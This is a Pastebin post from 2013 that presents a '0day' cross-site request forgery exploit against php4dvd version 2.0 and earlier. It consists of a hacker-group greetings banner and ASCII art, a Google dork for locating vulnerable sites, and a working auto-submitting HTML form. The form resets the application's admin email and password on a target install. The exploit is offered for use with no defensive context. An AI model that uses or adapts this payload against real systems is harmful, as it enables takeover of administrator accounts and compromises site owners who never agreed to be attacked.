API tools faq
paste
Advertisement
7days

php4dvd <= 2.0 CSRF

7days
Jun 6th, 2013
152
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.11 KB | None | 0 0
raw download clone embed print report
  1. #########################################################################
  2.  
  3. [+] Exploit Title : php4dvd <= 2.0 CSRF
  4. [+] Author : Pablo '7days' Riberio
  5. [+] Team: So Good Security
  6. [+] Other 0days : http://pastebin.com/u/7days
  7. [+] Version : <= 2.0
  8. [+] Tested on : windows/internet explorer
  9. [+] Details: Reset admin password via CSRF
  10. [+] Vendor: http://php4dvd.sourceforge.net
  11. [+] Duck : inurl:php4dvd/?go=profile
  12. #########################################################################
  13.  
  14. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  15. Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory,
  16. my home boy linus, all the cockneys and my grandma <3
  17. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  18. no thnx 2: microsoft, windoz, estate agents and recruiters
  19. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  20. `..`.:::.`
  21. .://o:::///:.
  22. `::+y+::::::/+/`
  23. :/++/::/:/--:+o:`
  24. `://:-:/-/:.-:/oo.
  25. `/-.-:::/o---::+o.
  26. ....-:/+hs::--:+o
  27. .``-//ohh+----:+.
  28. `.``-/+syhs:----/+`
  29. .-.`.-:+syyo:--.-:+/
  30. `---.`.-/+yo/:-----:+o.
  31. .::-...-:+/o/-.-----:+so`
  32. .-::-...-:::::-----:://osy:
  33. .::-....--:::----::/+ooosys-
  34. `:--.....-:/:::::/+osyyyyo:`
  35. ` `----...--:/++++oosyyhhy+-`
  36. :::::-------:::---..--:/+oossyyhhhhs/.
  37. ::::::-------:--.-.--:+osyyyhhhhho-`
  38. ------------.....--:/+oyyhhhhhy+.
  39. -----------...---:/+osyhhhhyo:`
  40. :::::-------:::/+osyyhhhhs/.
  41. ++++++++++++oossyyhhhhs/.
  42. sssssssyyyyhhhhhhhyo:.`
  43. ``..---..`
  44.  
  45. portuguese cyber army
  46. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  47. [+] Begin 0day
  48. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  49.  
  50. <html>
  51. <head>
  52. </head>
  53. <body>
  54. <!-- php4dvd csrf -->
  55.  
  56. <form action="http://www.victim.com/php4dvd/?go=profile" method="POST" id="csrf" name="csrf" onload="go()">
  57. <input type="hidden" name="email" value="0wnedx@0wned.comx" />
  58. <input type="hidden" name="password" value="0wned" />
  59. <input type="hidden" name="password2" value="0wned" />
  60. <input type="submit" name="submit" value="Save" />
  61. </form>
  62.  
  63. <script language="JavaScript" type="text/javascript">
  64. document.csrf.submit();
  65. </script>
  66. </body>
  67.  
  68. </html>
  69.  
  70. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  71. [+] End 0day
  72. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!